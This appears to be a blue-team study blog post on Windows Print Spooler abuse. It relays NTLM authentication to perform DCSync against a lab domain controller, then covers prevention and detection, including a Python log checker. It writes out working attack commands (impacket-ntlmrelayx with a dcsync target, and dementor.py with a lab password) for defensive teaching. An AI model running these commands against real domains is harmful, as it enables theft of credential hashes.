Blue Team Odyssey

A journey to Blue Team by RJ Hall

WINDOWS ATTACKS & DEFENSE

Print Spooler & NTLM Relaying

  1. Print Spooler & NTLM Relaying

    The command impacket-ntlmrelayx -t dcsync://172.16.18.4 -smb2support uses the ntlmrelayx tool from the Impacket suite to perform an NTLM relay attack whose target is a Domain Controller (DC) and whose goal is a DCSync. Here is a breakdown of each part of the command:
    1. impacket-ntlmrelayx: The tool from the Impacket suite used to perform NTLM relay attacks. An NTLM relay attack takes an NTLM authentication exchange initiated by a victim and forwards it to another service that accepts NTLM authentication, so the attacker authenticates as the victim without knowing the password.
    2. -t dcsync://172.16.18.4: Specifies the target of the relay. The dcsync prefix tells ntlmrelayx to perform a DCSync operation against the specified target, a Domain Controller at IP address 172.16.18.4. A DCSync attack simulates the behavior of a Domain Controller and asks the real DC to replicate credentials from Active Directory, effectively dumping password hashes from the DC.
    3. -smb2support: Enables SMBv2 support. Since NTLM relay attacks typically involve relaying NTLM authentication over SMB, enabling SMBv2 support is necessary if the system involved supports or requires SMBv2 for communication.
  2. Next, we need to trigger the PrinterBug from the Kali box while NTLMRelayx is listening. To trigger the connection back, we use Dementor (when run from a non-domain-joined machine, the credentials of any authenticated domain user are required; in this case we assume we had previously compromised Bob):
    1. python3 ./dementor.py 172.16.18.20 172.16.18.3 -u bob -d eagle.local -p Slavi123
    2. Now, switching back to the terminal session with NTLMRelayx, we will see that DCSync was successful:

  3. Preventing the abuse of Print Spooler
    1. Print Spooler should be disabled on all servers that are not print servers. Domain Controllers and other core servers should never carry additional roles or features that widen the attack surface toward the core AD infrastructure.
  4. Detecting the abuse of Print Spooler
    1. When NTLMRelayx is used to perform DCSync, no event ID 4662 is generated (as mentioned in the DCSync section). However, to obtain the hashes as DC1 from DC2, a successful logon event for DC1 is recorded on DC2, and that event originates from the IP address of the Kali machine rather than from the Domain Controller, as we can see below:
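The detection described above, as an added example that is not part of the original post: a check that flags a successful network logon (event ID 4624) by a Domain Controller machine account arriving from an address other than that DC's own. The address map and the sample log lines are constructed; the assignment of DC1 to 172.16.18.3, DC2 to 172.16.18.4 and the Kali host to 172.16.18.20 is assumed from the commands above.

```python
# Added example (not from the original post): flag 4624 network logons by a
# DC machine account whose source IP is not the DC's own address, which is the
# trace an NTLM relay to DCSync leaves on the receiving DC.
from typing import Dict, List

# Constructed inventory: DC machine accounts and their known addresses.
KNOWN_DCS: Dict[str, str] = {"DC1$": "172.16.18.3", "DC2$": "172.16.18.4"}


def parse_event(line: str) -> Dict[str, str]:
    """Parse a flattened 'Key=Value Key=Value ...' security-log line."""
    fields: Dict[str, str] = {}
    for token in line.split():
        key, _, value = token.partition("=")
        fields[key] = value
    return fields


def is_relayed_dc_logon(ev: Dict[str, str]) -> bool:
    """True for a 4624 network logon (LogonType 3) by a known DC machine
    account from an IP other than that DC's own address."""
    if ev.get("EventID") != "4624" or ev.get("LogonType") != "3":
        return False
    expected_ip = KNOWN_DCS.get(ev.get("TargetUserName", "").upper())
    if expected_ip is None:
        return False  # not a DC machine account, out of scope here
    return ev.get("IpAddress") != expected_ip


def find_relayed_dc_logons(lines: List[str]) -> List[Dict[str, str]]:
    """Run the check over raw log lines and return the matching events."""
    return [ev for ev in map(parse_event, lines) if is_relayed_dc_logon(ev)]


# Constructed sample lines, as they might be logged on DC2 (172.16.18.4):
# a normal DC1 logon from DC1 itself, the relayed DC1 logon from the Kali
# host, and an unrelated user logon.
SAMPLE_LOG = [
    "EventID=4624 TargetUserName=DC1$ LogonType=3 AuthenticationPackageName=Kerberos IpAddress=172.16.18.3",
    "EventID=4624 TargetUserName=DC1$ LogonType=3 AuthenticationPackageName=NTLM IpAddress=172.16.18.20",
    "EventID=4624 TargetUserName=bob LogonType=3 AuthenticationPackageName=NTLM IpAddress=172.16.18.50",
]

if __name__ == "__main__":
    for ev in find_relayed_dc_logons(SAMPLE_LOG):
        print(f"ALERT: {ev['TargetUserName']} logged on from {ev['IpAddress']} "
              f"via {ev['AuthenticationPackageName']}")
```

Pairing the alert with the absence of a matching 4662 on the source DC, as the post notes, is what distinguishes this from ordinary replication traffic between DCs.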
